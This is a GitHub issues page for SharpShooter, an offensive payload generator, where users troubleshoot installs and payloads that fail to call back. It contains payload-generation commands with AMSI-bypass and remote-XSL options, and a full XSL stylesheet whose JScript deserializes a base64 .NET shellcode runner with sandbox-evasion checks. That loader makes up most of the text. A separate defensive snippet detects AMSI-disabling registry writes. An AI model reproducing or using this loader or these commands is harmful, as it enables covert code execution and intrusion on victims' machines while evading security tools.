mdsecactivebreach / sharpshooter
Payload Generation Framework
License: BSD 3-Clause "New" or "Revised" License
When I installed it, it said ImportError: No module named jsmin.
How can I fix this?
Hi there,
In the blog posts it is shown that the reverse_http C# shellcode is used. However, after a couple of hours of trying to use the tool for the first time, thinking I was doing something wrong, I decided to switch to reverse_tcp and it worked on the first try.
Using the newest version of Kali and Windows 7 SP1 with .NET 2-4 (FireEye FLARE packages installed).
Hi, I came across this yesterday and thought it was a really cool project so today I'm having a little play!
I have generated a C# payload from Cobalt Strike, put it in the format "0x41, 0x42" etc., and then referenced that in my command:
python SharpShooter.py --dotnetver 2 --stageless --payload hta --rawscfile ~/payload.cs --smuggle --output payload --template mcafee
I host the HTML and HTA on the web server using "host file" in Cobalt Strike. When I go and visit the page, the HTA downloads and I can execute it, but I don't get a callback.
I've had a skim of the source code but it's not immediately obvious to me why this wouldn't work. I have .NET installed on the machine I'm testing on also.
I suppose I'm asking: does this definitely work with Cobalt Strike C# payloads?
Thanks again for the project and look forward to your response.
Cheers
EDIT 14:33:
I have been testing again: I put the same shellcode into the CS file, compiled and executed it, and it worked fine. It's not an EDR product blocking either, so I am still unsure. It just doesn't seem to work when using the generated HTA file.
When I start SharpShooter after installing requirements.txt, I do python SharpShooter.py but it doesn't start. I also tried to do chmod +x or 777 on SharpShooter.py but it always gives me this error:
Traceback (most latest call last):
File "SharpShooter.py", line 20, in
from jsmin import jsmin
ImportError: no module called jsmin
chmod 755 SharpShooter.py
I've done a recent git clone and it appears not to accept anything other than the staged HTA payload, and even then it does not appear to connect back to the attacking machine. The demo one-liners result in a looping error in its selection.
Am I missing something, or is the tool just not ready to be used?
I successfully installed jsmin; running python SharpShooter.py is still not locating jsmin even though it exists on the system. Kindly advise.
How can I use a custom payload (HTA, VBS, JS, etc.)?
Detects the process in memory and freezes it. Some days ago it wasn't detected...
I was looking at your recent commit adding the AMSI bypass for the VB and JS methods, and looked for the registry path HKCU\Software\Microsoft\Windows Script\Settings\
on my 1803 Windows machine, but couldn't find it. There is a HKCU\Software\Microsoft\Windows Script Host\Settings\
key, however.
Just wanted to make sure that the path wasn't in error.
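The path this issue asks about is the one that matters from a monitoring point of view: a value named AmsiEnable set to 0 under HKCU\Software\Microsoft\Windows Script\Settings switches AMSI off for the Windows Script engines (the --amsi amsienable option used in another issue on this page refers to the same value), whereas the Windows Script Host\Settings key is ordinary WSH configuration that exists on a default install. The detection snippet below is an added example, not part of SharpShooter or any MDSec code. It runs over constructed Sysmon-style Event ID 13 (RegistryEvent: Value Set) lines in an assumed "key=value | key=value" layout and flags only writes of AmsiEnable=0 under the Windows Script\Settings subkey, matching on the subkey tail because Sysmon reports the per-user hive as HKU\<SID> rather than HKCU.

```python
import re
from typing import Dict, List, Optional

# Match on the subkey tail: Sysmon writes the per-user hive as HKU\<SID>\...,
# so a literal "HKCU" prefix would never match a real event.
AMSI_VALUE_RE = re.compile(
    r"\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable$", re.IGNORECASE
)

# Constructed sample lines (not real telemetry) in an assumed
# "key=value | key=value" layout for Sysmon Event ID 13 (Value Set).
# Line 2 touches the lookalike "Windows Script Host\Settings" key and must
# not fire; line 3 sets AmsiEnable back to 1 and must not fire either.
SAMPLE_EVENTS = [
    r"EventID=13 | Image=C:\Windows\System32\wscript.exe | TargetObject=HKU\S-1-5-21-1000-1000-1000-1001\Software\Microsoft\Windows Script\Settings\AmsiEnable | Details=DWORD (0x00000000)",
    r"EventID=13 | Image=C:\Windows\System32\cscript.exe | TargetObject=HKU\S-1-5-21-1000-1000-1000-1001\Software\Microsoft\Windows Script Host\Settings\Timeout | Details=DWORD (0x00000000)",
    r"EventID=13 | Image=C:\Windows\explorer.exe | TargetObject=HKU\S-1-5-21-1000-1000-1000-1001\Software\Microsoft\Windows Script\Settings\AmsiEnable | Details=DWORD (0x00000001)",
    r"EventID=1 | Image=C:\Windows\System32\wscript.exe | CommandLine=wscript.exe payload.js",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'k=v | k=v' line into a dict; only the first '=' separates key and value."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def dword_value(details: str) -> Optional[int]:
    """Extract the integer from Sysmon's 'DWORD (0x00000000)' rendering, or None."""
    m = re.search(r"DWORD \((0x[0-9a-fA-F]+)\)", details)
    return int(m.group(1), 16) if m else None


def is_amsi_disable_event(fields: Dict[str, str]) -> bool:
    """True for a value-set event that writes AmsiEnable=0 under Windows Script\\Settings."""
    if fields.get("EventID") != "13":
        return False
    if not AMSI_VALUE_RE.search(fields.get("TargetObject", "")):
        return False
    return dword_value(fields.get("Details", "")) == 0


def find_amsi_disable_events(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed events that disable AMSI for the script engines."""
    return [f for f in map(parse_event, lines) if is_amsi_disable_event(f)]


if __name__ == "__main__":
    for hit in find_amsi_disable_events(SAMPLE_EVENTS):
        print("AMSI disabled for Windows Script engines by", hit["Image"], "->", hit["TargetObject"])
```

On the sample input only the first line is reported: the Windows Script Host\Settings write and the AmsiEnable=1 write are both ignored, which is the distinction the issue above is asking about. Writes of this value by anything other than an administrator's configuration tooling are worth alerting on, since the value is normally absent.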
Hi,
I'm getting a similar problem to mdsecactivebreach/CACTUSTORCH#4. Basically, I am generating a payload using the following arguments:
python SharpShooter.py --stageless --dotnetver 4 --payload macro --output foo --amsi amsienable --rawscfile payload.bin --com xslremote --awlurl http://172.16.132.1:80/foo.xsl
The macro is then run on a Win 10 host with only .NET Framework v4 installed (no .NET v2). However, with both my own assembly and the built-in SharpShooter assembly, the code executes but I get no callbacks. After putting in some debug shell.popups, it looks like it's failing when it gets to some of the System calls. Is there some sort of issue with running the JScript from XSL on systems with only .NET v4 installed? The JScript runs fine on the same system when executed from a SCT file etc.
Code below:
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:sharp="http://sharp.shooter/mynamespace">
<msxsl:script language="JScript" implements-prefix="sharp">
function shooter(nodelist) {
<![CDATA[
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAACoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAC2SEWgAAAAAA"+
"AAAA4AAiIAsBMAAAIAAAAAgAAAAAAACKPwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAOD8A"+
"AE8AAAAAQAAAVAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAA+AAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAACQHwAAACAAAAAgAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAVAQAAABA"+
"AAAABgAAACIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAoAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAGw/AAAAAAAASAAAAAIABQDMIwAANBoAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXgMoEAAACm8R"+
"AAAKFygSAAAKLAIXKhYqbnIBAABwKBAAAApvEQAAChcoEgAACiwCFioXKhMwBABSAQAAAQAAEXMT"+
"AAAKCh8gjRoAAAElFnIDAABwoiUXclUAAHCiJRhypQAAcKIlGXLzAABwoiUackUBAHCiJRtylQEA"+
"cKIlHHLhAQBwoiUdcjkCAHCiJR5yjQIAcKIlHwly3QIAcKIlHwpyNwMAcKIlHwtyhwMAcKIlHwxy"+
"3wMAcKIlHw1yNwQAcKIlHw5ylwQAcKIlHw9y5wQAcKIlHxByPQUAcKIlHxFykwUAcKIlHxJy4wUA"+
"cKIlHxNyOQYAcKIlHxRyfQYAcKIlHxVywQYAcKIlHxZyBwcAcKIlHxdySQcAcKIlHxhymwcAcKIl"+
"Hxly6QcAcKIlHxpyOwgAcKIlHxtykwgAcKIlHxxy4wgAcKIlHx1yQQkAcKIlHx5yiwkAcKIlHx9y"+
"zwkAcKILFgwrFwcImg0JKBQAAAosBwYJbxUAAAoIF1gMCAeOaTLjBm8WAAAKLQIWKhcqAAATMAYA"+
"xwAAAAIAABFzEwAACgobjRoAAAElFnIZCgBwoiUXcicKAHCiJRhyNQoAcKIlGXJDCgBwoiUaclEK"+
"AHCiCygXAAAKDBYNK3YICZoTBAcTBRYTBitdEQURBpoTBxEEbxgAAApvGQAACm8aAAAKEQdvGgAA"+
"Cm8bAAAKLDEGEQRvGAAACm8ZAAAKcl8KAHByaQoAcCgcAAAKF40fAAABJRYfOp1vHQAACm8VAAAK"+
"EQYXWBMGEQYRBY5pMpsJF1gNCQiOaTKEBm8WAAAKLQIWKhcqLigeAAAKLAIXKhYqHgIoHwAACioA"+
"EzACAG0AAAADAAARcwYAAAYKA0UFAAAAAQAAABEAAAAgAAAALwAAAD4AAAAqBgRvAQAABi1CFygg"+
"AAAKKgZvAgAABi0zFyggAAAKKgZvAwAABiwkFyggAAAKKgZvBAAABiwVFyggAAAKKgZvBQAABiwG"+
"FyggAAAKKjJzCgAABgNvDQAABioAABswBABbAAAABAAAEQMoIQAACgp+IgAACgaOaRdYaigjAAAK"+
"IAAwAAAfQCgHAAAGCwYWBwaOaSgkAAAKB9AHAAACKCUAAAooJgAACnQHAAACbw8AAAYm3g4HFiAA"+
"gAAAKAkAAAYm3CoAARAAAAIAJAAoTAAOAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAA"+
"AAUAbAAAAPAFAAAjfgAAXAYAAOwGAAAjU3RyaW5ncwAAAABIDQAAdAoAACNVUwC8FwAAEAAAACNH"+
"VUlEAAAAzBcAAGgCAAAjQmxvYgAAAAAAAAACAAABVx0CHAkCAAAA+gEzABYAAAEAAAAoAAAABwAA"+
"ABcAAAARAAAAFwAAACYAAAAUAAAAEQAAAAQAAAACAAAAAQAAAAMAAAABAAAAAgAAAAQAAAAAAEEE"+
"AQAAAAAABgARA4cFBgB+A4cFBgAtAj0FDwCnBQAABgBVApQEBgDDApQEBgCkApQEBgBlA5QEBgAx"+
"A5QEBgBKA5QEBgBsApQEBgBBAmgFBgAfAmgFBgCHApQEBgBqBloEBgABAOYACgBiAXYEBgACA1oE"+
"BgBhBFoEBgC3BGgFBgDgAmgFBgANAloEBgCTBloEBgAPBFoECgC5BXYEBgAEBFoEBgDJBFoEBgDB"+
"AX8ACgAhBnYECgDLBv8FBgDiBFoEBgDnBD0FBgCnBloEBgDDBloEBgA2BVoEBgA1BVoEBgAsBGgF"+
"BgDsAVoEBgCdAVoEBgAWAloEAAAAAB0AAAAAAAEAAQAAABAA8QEAAD0AAQABAAEAEAAaBQAAPQAB"+
"AAcAAgEAAOIBAABNAAEADgACAQAApgQAAE0ACQAOAAIBAADXAQAATQAVAA4AAgEAAP0BAABZABgA"+
"DgAGBswALgFWgKoAMQFWgFkAMQFWgJ4AMQFWgIkAMQFWgG0AMQFWgHYAMQFWgGEAMQEGBswALgFW"+
"gFEANQFWgCYANQFWgD8ANQFWgLoANQFWgJUANQFWgLEANQFWgEcANQFWgMIANQFWgK8DNQFWgMID"+
"NQFWgNcDNQEGBswALgFWgKQAOQFWgDMAOQFQIAAAAACGAGYEcQABAGggAAAAAIYARAE9AQIAhCAA"+
"AAAAhgBKBj0BAgDkIQAAAACGAN0APQECALciAAAAAIYAKgE9AQIAwyIAAAAAhhgvBQYAAgAAAAAA"+
"gACRIAEBQQECAAAAAACAAJYgGQFLAQYAAAAAAIAAkSB7AVUBDADDIgAAAACGGC8FBgAPAMwiAAAA"+
"AIYA8QFdAQ8ARSMAAAAAhgDaBBAAEQBUIwAAAACGAL0GEAASAAAAAAADAIYYLwVjARMAAAAAAAMA"+
"xgGWAU4AFQAAAAAAAwDGAZEBaQEVAAAAAAADAMYBhwFxARcAAAABAG8EAAABADEGAAACAKgDAAAD"+
"AOABAAAEAHgGAAABAMwFAAACAJwDAAADADsGAAAEAPAEAAAFAN8FAAAGAA4BAAABADEGAAACAKgD"+
"AAADANUBAAABACYEAAACAAsEAAABABEAAAABABEAAAABAHEGAAACAFsBAAABAB0EAAACAHEGAAAB"+
"AKAGCQAvBQEAEQAvBQYAGQAvBQoAKQAvBRAAMQAvBRAAOQAvBRAAQQAvBRAASQAvBRAAUQAvBRAA"+
"WQAvBRAAYQAvBRUAaQAvBRAAcQAvBRAAkQAvBQYAqQAvBRoAyQC2BSAAyQDGASUA0QDvBSkADAAv"+
"BQYA4QBjBkMADAAmAUgADACzBk4AiQBQBWYAiQAeBmwAeQACBCUA0QAnBSUA0QD2BXEA8QBzAXYA"+
"0QBTAX0AAQE1AYMAeQAvBQYACQGOBowAEQHxA5cAGQHdBJ0AIQGCBqAAKQHmBqUAMQGvAa4AKQH8"+
"BLcACQAIAMoACQAMAM8ACQAQANQACQAUANkACQAYAN4ACQAcAOMACQAgAOgACQAoAO0ACQAsAPIA"+
"CQAwAPcACQA0APwACQA4AAEBCQA8AAYBCQBAAAsBCQBEABABCQBIABUBCQBMABoBCQBQAB8BCQBY"+
"ACQBCQBcACkBLgALAHcBLgATAIABLgAbAJ8BLgAjAKgBLgArAMIBLgAzAOUBLgA7AOsBLgBDAKgB"+
"LgBLAAMCLgBTAOUBLgBbAOUBLgBjACsCLgBrAFUCYwBbAGICgwBzAAEBowBzAAEB4wB7AJ8BMQBS"+
"AIcAkQA0BAgAPQBAAQ8AAQEBAAABEQAZAQEAAAETAHsBAgAEgAAAAQAAAAAAAAAAAAAAAADRBgAA"+
"AgAAAAAAAAAAAAAAwQDUAAAAAAACAAAAAAAAAAAAAADBAFoEAAAAAAQAAwAFAAMABgADAAcAAwAA"+
"AAAAAExpc3RgMQBrZXJuZWwzMgBzaGVsbGNvZGU2NAA8TW9kdWxlPgBFWEVDVVRFX1JFQUQATUVN"+
"X1JFTEVBU0UARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAFdSSVRFX1dBVENIAFBI"+
"WVNJQ0FMAFRPUF9ET1dOAFN5c3RlbS5JTwBMQVJHRV9QQUdFUwBOT0FDQ0VTUwBSRVNFVABNRU1f"+
"REVDT01NSVQAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBpc0Jh"+
"ZE1hYwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBWaXJ0dWFsQWxsb2MAbHBUaHJlYWRJZABD"+
"cmVhdGVUaHJlYWQAQWRkAGlzRGVidWdnZWQAZ2V0X0lzQXR0YWNoZWQAaXNEb21haW5Kb2luZWQA"+
"VHJpbUVuZABtZXRob2QATmV0d29ya0ludGVyZmFjZQBSZXBsYWNlAFZpcnR1YWxGcmVlAEVuZElu"+
"dm9rZQBCZWdpbkludm9rZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxl"+
"AGdldF9Eb21haW5OYW1lAGR3RnJlZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBDaGVja1BsZWFzZQBF"+
"eGVjdXRlRGVsZWdhdGUATXVsdGljYXN0RGVsZWdhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxl"+
"QXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3Nl"+
"bWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2Vt"+
"Ymx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFVu"+
"bWFuYWdlZEZ1bmN0aW9uUG9pbnRlckF0dHJpYnV0ZQBGbGFnc0F0dHJpYnV0ZQBDb21waWxhdGlv"+
"blJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNv"+
"cHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGli"+
"aWxpdHlBdHRyaWJ1dGUAZHdTdGFja1NpemUAZHdTaXplAEdVQVJEX01vZGlmaWVyZmxhZwBOT0NB"+
"Q0hFX01vZGlmaWVyZmxhZwBXUklURUNPTUJJTkVfTW9kaWZpZXJmbGFnAEZyb21CYXNlNjRTdHJp"+
"bmcAVG9TdHJpbmcAYXJnAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sAY2hlY2sATWFyc2hhbABrZXJu"+
"ZWwzMi5kbGwAU2hhcnBTaG9vdGVyQXNzZW1ibHkuZGxsAFN5c3RlbQBFbnVtAGlzRG9tYWluAGRv"+
"bWFpbgBTeXN0ZW0uTmV0Lk5ldHdvcmtJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNZW1v"+
"cnlQcm90ZWN0aW9uAENhbGxpbmdDb252ZW50aW9uAFN0cmluZ0NvbXBhcmlzb24AR28AWmVybwBD"+
"aGFyAERlYnVnZ2VyAGxwUGFyYW1ldGVyAEdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyAFNo"+
"YXJwU2hvb3RlcgBUb0xvd2VyAC5jdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAEdldEFs"+
"bE5ldHdvcmtJbnRlcmZhY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u"+
"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEdldElQR2xvYmFsUHJvcGVy"+
"dGllcwBscFRocmVhZEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAEVxdWFscwBDb250YWlucwBT"+
"eXN0ZW0uVGV4dC5SZWd1bGFyRXhwcmVzc2lvbnMAR2V0UGh5c2ljYWxBZGRyZXNzAGxwQWRkcmVz"+
"cwBscFN0YXJ0QWRkcmVzcwBjb250YWluc1NhbmRib3hBcnRpZmFjdHMARXhpc3RzAE9iamVjdABv"+
"YmplY3QAZmxQcm90ZWN0AG9wX0V4cGxpY2l0AEV4aXQASUFzeW5jUmVzdWx0AHJlc3VsdABFbnZp"+
"cm9ubWVudABnZXRfQ291bnQAU2hvb3QAQ29udmVydABSZWdleABTaGFycFNob290ZXJBc3NlbWJs"+
"eQBDb3B5AAAAAQBRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARABy"+
"AGkAdgBlAHIAcwBcAFYAbQBtAG8AdQBzAGUALgBzAHkAcwAAT0MAOgBcAHcAaQBuAGQAbwB3AHMA"+
"XABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AMwBkAGcAbAAuAGQAbABs"+
"AABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIA"+
"cwBcAHYAbQBkAHUAbQAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0"+
"AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAHYAbQAzAGQAdgBlAHIALgBkAGwAbAAAT0MAOgBcAHcA"+
"aQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdABy"+
"AGEAeQAuAGQAbABsAABLQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwA"+
"RAByAGkAdgBlAHIAcwBcAHYAbQBjAGkALgBzAHkAcwAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdQBzAGIAbQBvAHUAcwBlAC4A"+
"cwB5AHMAAFNDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2"+
"AGUAcgBzAFwAdgBtAHgAXwBzAHYAZwBhAC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwA"+
"UwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHgAbgBlAHQALgBzAHkAcwAA"+
"WUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMA"+
"XABWAE0AVABvAG8AbABzAEgAbwBvAGsALgBkAGwAbAAAT0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AaABnAGYAcwAuAGQAbABsAABX"+
"QwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBc"+
"AHYAbQBtAG8AdQBzAGUAdgBlAHIALgBkAGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkA"+
"cwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0ARwB1AGUAcwB0AEwAaQBiAC4AZABs"+
"AGwAAF9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUA"+
"cgBzAFwAVgBtAEcAdQBlAHMAdABMAGkAYgBKAGEAdgBhAC4AZABsAGwAAE9DADoAXAB3AGkAbgBk"+
"AG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHMAYwBzAGkA"+
"LgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBp"+
"AHYAZQByAHMAXABWAEIAbwB4AE0AbwB1AHMAZQAuAHMAeQBzAABVQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAFYAQgBvAHgARwB1AGUAcwB0"+
"AC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIA"+
"aQB2AGUAcgBzAFwAVgBCAG8AeABTAEYALgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXABWAEIAbwB4AFYAaQBkAGUAbwAuAHMA"+
"eQBzAABDQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABk"+
"AGkAcwBwAC4AZABsAGwAAENDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUA"+
"XAB2AGIAbwB4AGgAbwBvAGsALgBkAGwAbAAARUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBu"+
"AGEAdABpAHYAZQBcAHYAYgBvAHgAbQByAHgAbgBwAC4AZABsAGwAAEFDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAC4AZABsAGwAAFFDADoAXAB3"+
"AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAGEAcgByAGEA"+
"eQBzAHAAdQAuAGQAbABsAABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBl"+
"AFwAdgBiAG8AeABvAGcAbABjAHIAdQB0AGkAbAAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABvAGcAbABlAHIAcgBvAHIAcwBwAHUALgBk"+
"AGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgA"+
"bwBnAGwAZgBlAGUAZABiAGEAYwBrAHMAcAB1AC4AZABsAGwAAE9DADoAXAB3AGkAbgBkAG8AdwBz"+
"AFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAHAAYQBjAGsAcwBwAHUALgBkAGwA"+
"bAAAXUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAbwBn"+
"AGwAcABhAHMAcwB0AGgAcgBvAHUAZwBoAHMAcAB1AC4AZABsAGwAAElDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AHMAZQByAHYAaQBjAGUALgBlAHgAZQAA"+
